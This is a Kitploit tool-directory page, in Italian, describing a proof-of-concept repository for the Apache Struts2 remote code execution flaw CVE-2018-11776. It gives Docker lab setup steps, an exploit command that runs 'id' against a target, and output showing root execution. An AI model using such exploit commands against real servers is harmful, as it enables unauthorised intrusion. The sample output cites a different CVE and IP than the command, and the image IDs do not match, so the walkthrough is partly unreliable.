Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ApacheStruts-CVE-2018-11776 — Proof-of-concept Python per la vulnerabilità di esecuzione remota di codice Apache Struts2 CVE-2018-11776, con container Docker per test su versioni interessate 2.3-2.3.34 e 2.5-2.5.16. | Kitploit
Strumenti/GitHubGitHub/freshdemo/apachestruts-cve-2018-11776
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubfreshdemo/apachestruts-cve-2018-11776

ApacheStruts-CVE-2018-11776

Proof-of-concept Python per la vulnerabilità di esecuzione remota di codice Apache Struts2 CVE-2018-11776, con container Docker per test su versioni interessate 2.3-2.3.34 e 2.5-2.5.16.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
6 anni faNon ancora revisionato

Apache Struts CVE-2018-11776 Python PoC

Questo si basa su https://github.com/hook-s3c/CVE-2018-11776-Python-PoC. La creazione del container e le istruzioni non funzionavano come descritto nel README, quindi è stato creato questo fork. L'exploit POC utilizzato è di Rapid7.

Riconoscimenti:

hook-s3c (github.com/hook-s3c), @hook_s3c su Twitter
Rapid7 https://github.com/rapid7/metasploit-framework/issues/8064

Introduzione

Man Yue Mo di Semmle ha divulgato una vulnerabilità RCE in Struts2, veicolata tramite un payload codificato nel percorso URL di una richiesta.

Le versioni interessate sono 2.3 fino a 2.3.34 e 2.5 fino a 2.5.16.

La configurazione predefinita non è vulnerabile. Questo contenitore, e molti altri, sono vulnerabili.

Passo 1 - Creazione del Container

È preferibile creare un container da un Dockerfile quando puoi vedere cosa viene inserito nella build.


git clone https://github.com/freshdemo/ApacheStruts-CVE-2018-11776 ./Struts
cd Struts
docker build . -t freshdemo/apachestruts

Trova il nuovo container con


docker images

L'output dovrebbe essere simile a questo, dove puoi ottenere l'ID dell'immagine.


root@kitploit:~
   root@DockerHost:~/ApacheStruts-CVE-2018-11776# docker images
REPOSITORY                                 TAG                 IMAGE ID            CREATED              SIZE 
freshdemo/apachestruts latest 6586cedf49fa About a minute ago 542MB

Passo 2 - Esecuzione del Container

Crea e avvia un container con il seguente comando.


docker run -d --name apachestruts -p 8080:8080 d39018c50afe

Passo 3 - Exploit

Assicurati che i firewall di ingresso/uscita consentano la porta specificata in precedenza (8080), ed esegui l'exploit contro il tuo target con il seguente comando.


python struts.py http://192.168.2.188:8080 'id'

Il tuo output dovrebbe essere simile a questo.


root@kitploit:~
root@k:/home/s# python struts.py http://192.168.2.188:8080 'id'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
http://13.88.250.188:8080 : [*] cmd: id


uid=0(root) gid=0(root) groups=0(root) 

Scarica lo strumento